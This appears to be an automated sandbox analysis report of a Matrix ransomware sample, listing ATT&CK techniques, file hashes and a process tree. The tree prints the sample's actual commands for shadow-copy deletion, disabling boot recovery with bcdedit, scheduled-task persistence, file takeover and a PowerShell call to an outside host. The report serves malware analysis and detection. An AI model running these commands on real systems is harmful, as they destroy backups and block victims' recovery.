File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\QP.XML	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18219_.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287018.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Brunei	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Document Themes 14\Apex.thmx	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\HEADINGBB.DPV	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Stationery\1033\CURRENCY.HTM	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1324 schtasks.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

1440 vssadmin.exe
792 vssadmin.exe

pid	process
1324	schtasks.exe

pid	process
1440	vssadmin.exe
792	vssadmin.exe

Modifies Control Panel 5 IoCs

evasion

Processes:

reg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\WallpaperStyle = "0"	reg.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exeGBVottoK64.exepowershell.exe

pid process

1164 powershell.exe
1164 powershell.exe
1216 GBVottoK64.exe
1216 GBVottoK64.exe
1216 GBVottoK64.exe
1224 powershell.exe
1224 powershell.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

GBVottoK64.exe

pid process

1216 GBVottoK64.exe

pid	process
1164	powershell.exe
1164	powershell.exe
1216	GBVottoK64.exe
1216	GBVottoK64.exe
1216	GBVottoK64.exe
1224	powershell.exe
1224	powershell.exe

pid	process
1216	GBVottoK64.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

Processes:

powershell.exeGBVottoK64.exevssvc.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	1216	GBVottoK64.exe
Token: SeLoadDriverPrivilege	1216	GBVottoK64.exe
Token: SeBackupPrivilege	1688	vssvc.exe
Token: SeRestorePrivilege	1688	vssvc.exe
Token: SeAuditPrivilege	1688	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe
Token: SeDebugPrivilege	1544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1544	WMIC.exe
Token: SeRemoteShutdownPrivilege	1544	WMIC.exe
Token: SeUndockPrivilege	1544	WMIC.exe
Token: SeManageVolumePrivilege	1544	WMIC.exe
Token: 33	1544	WMIC.exe
Token: 34	1544	WMIC.exe
Token: 35	1544	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe
Token: SeDebugPrivilege	1544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1544	WMIC.exe
Token: SeRemoteShutdownPrivilege	1544	WMIC.exe
Token: SeUndockPrivilege	1544	WMIC.exe
Token: SeManageVolumePrivilege	1544	WMIC.exe
Token: 33	1544	WMIC.exe
Token: 34	1544	WMIC.exe
Token: 35	1544	WMIC.exe
Token: SeDebugPrivilege	1224	powershell.exe

Suspicious use of WriteProcessMemory 108 IoCs

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1064 wrote to memory of 1920	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1920	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1920	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1920	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1968	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWodi944.exe
PID 1064 wrote to memory of 1968	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWodi944.exe
PID 1064 wrote to memory of 1968	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWodi944.exe
PID 1064 wrote to memory of 1968	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWodi944.exe
PID 1064 wrote to memory of 108	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 108	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 108	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 108	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 108 wrote to memory of 1164	108	cmd.exe	powershell.exe
PID 108 wrote to memory of 1164	108	cmd.exe	powershell.exe
PID 108 wrote to memory of 1164	108	cmd.exe	powershell.exe
PID 108 wrote to memory of 1164	108	cmd.exe	powershell.exe
PID 1064 wrote to memory of 1584	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1584	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1584	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1584	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1616	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1616	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1616	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1616	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1584 wrote to memory of 828	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 828	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 828	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 828	1584	cmd.exe	reg.exe
PID 1616 wrote to memory of 788	1616	cmd.exe	wscript.exe
PID 1616 wrote to memory of 788	1616	cmd.exe	wscript.exe
PID 1616 wrote to memory of 788	1616	cmd.exe	wscript.exe
PID 1616 wrote to memory of 788	1616	cmd.exe	wscript.exe
PID 1584 wrote to memory of 524	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 524	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 524	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 524	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 752	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 752	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 752	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 752	1584	cmd.exe	reg.exe
PID 788 wrote to memory of 1388	788	wscript.exe	cmd.exe
PID 788 wrote to memory of 1388	788	wscript.exe	cmd.exe
PID 788 wrote to memory of 1388	788	wscript.exe	cmd.exe
PID 788 wrote to memory of 1388	788	wscript.exe	cmd.exe
PID 1388 wrote to memory of 1324	1388	cmd.exe	schtasks.exe
PID 1388 wrote to memory of 1324	1388	cmd.exe	schtasks.exe
PID 1388 wrote to memory of 1324	1388	cmd.exe	schtasks.exe
PID 1388 wrote to memory of 1324	1388	cmd.exe	schtasks.exe
PID 1064 wrote to memory of 1516	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1516	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1516	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1064 wrote to memory of 1516	1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1516 wrote to memory of 1400	1516	cmd.exe	attrib.exe
PID 1516 wrote to memory of 1400	1516	cmd.exe	attrib.exe
PID 1516 wrote to memory of 1400	1516	cmd.exe	attrib.exe
PID 1516 wrote to memory of 1400	1516	cmd.exe	attrib.exe
PID 788 wrote to memory of 1836	788	wscript.exe	cmd.exe
PID 788 wrote to memory of 1836	788	wscript.exe	cmd.exe
PID 788 wrote to memory of 1836	788	wscript.exe	cmd.exe
PID 788 wrote to memory of 1836	788	wscript.exe	cmd.exe
PID 1836 wrote to memory of 1576	1836	cmd.exe	schtasks.exe
PID 1836 wrote to memory of 1576	1836	cmd.exe	schtasks.exe
PID 1836 wrote to memory of 1576	1836	cmd.exe	schtasks.exe
PID 1836 wrote to memory of 1576	1836	cmd.exe	schtasks.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1400 attrib.exe

pid	process
1400	attrib.exe

C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
"C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\NWodi944.exe"
  2⤵
  PID:1920
- C:\Users\Admin\AppData\Local\Temp\NWodi944.exe
  "C:\Users\Admin\AppData\Local\Temp\NWodi944.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1968
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ST2Yn9mk.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:108
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blacklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BJ2ttsem.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1584
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BJ2ttsem.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    - Modifies Control Panel
    PID:828
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    - Modifies Control Panel
    PID:524
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - Matrix Ransomware
    - Modifies Control Panel
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:788
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1388
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1324
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1836
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\HRiS85Na.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Views/modifies file attributes
    PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe
      GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1284
    - - C:\Users\Admin\AppData\Local\Temp\GBVottoK64.exe
        
        GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Modifies service
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216

C:\Windows\system32\taskeng.exe
taskeng.exe {4CA8C3E2-9FB4-4250-86BD-FB786BBAC5A4} S-1-5-21-403932158-3302036622-1224131197-1000:ELJKIHEZ\Admin:Interactive:[1]
1⤵
PID:1404
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat"
  2⤵
  PID:568
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
  - - C:\Windows\system32\vssadmin.exe
      "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:792
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1544
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:556
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1336

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48

MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481

MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566

MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5

MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84

MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_911495e8-cf87-4437-96d1-481e0f036ed1

MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a

MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
e531ac4f51dfadb824ac091f93c6b7ba

SHA1
5498ed56ec830e7f8f628fca3eadba39083a2d2d

SHA256
eb874efbbe6f8cce018ee1fd0ab7f5f0a9be6384e10907fbd911b722288a0120

SHA512
ef0285f303114ac9e1437d2dad1664b7fe994fee609b5e97b46f209948b96401ee3d66e56a6237de4bd4342eb5bd8172eeb269718e8e5b4c1a9034b2ceafc294

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBVottoK64.exe

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRiS85Na.bat

MD5
c020768d57e25c5d6fda2e42938ea279

SHA1
89679d95e27e5b585c59b0af70168129e2032ce2

SHA256
628aa3a2944d5eb246a26c2d4d154bcc5c7fe19ec0715c547cd58cce4e2755fe

SHA512
263320e1a847163fa1415af6519dc7a51279444d2946ef425f2ac2b307d633e783262547f3f39bc40b7fffe5705b5759e4d80186177bac38f6dc4891afe354b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWodi944.exe

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWodi944.exe

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ST2Yn9mk.txt

MD5
75564e2df4b8c8d33695e8e5e58cb03c

SHA1
64a796a9f01a1f12bcbe641ecc92541a41ece9b5

SHA256
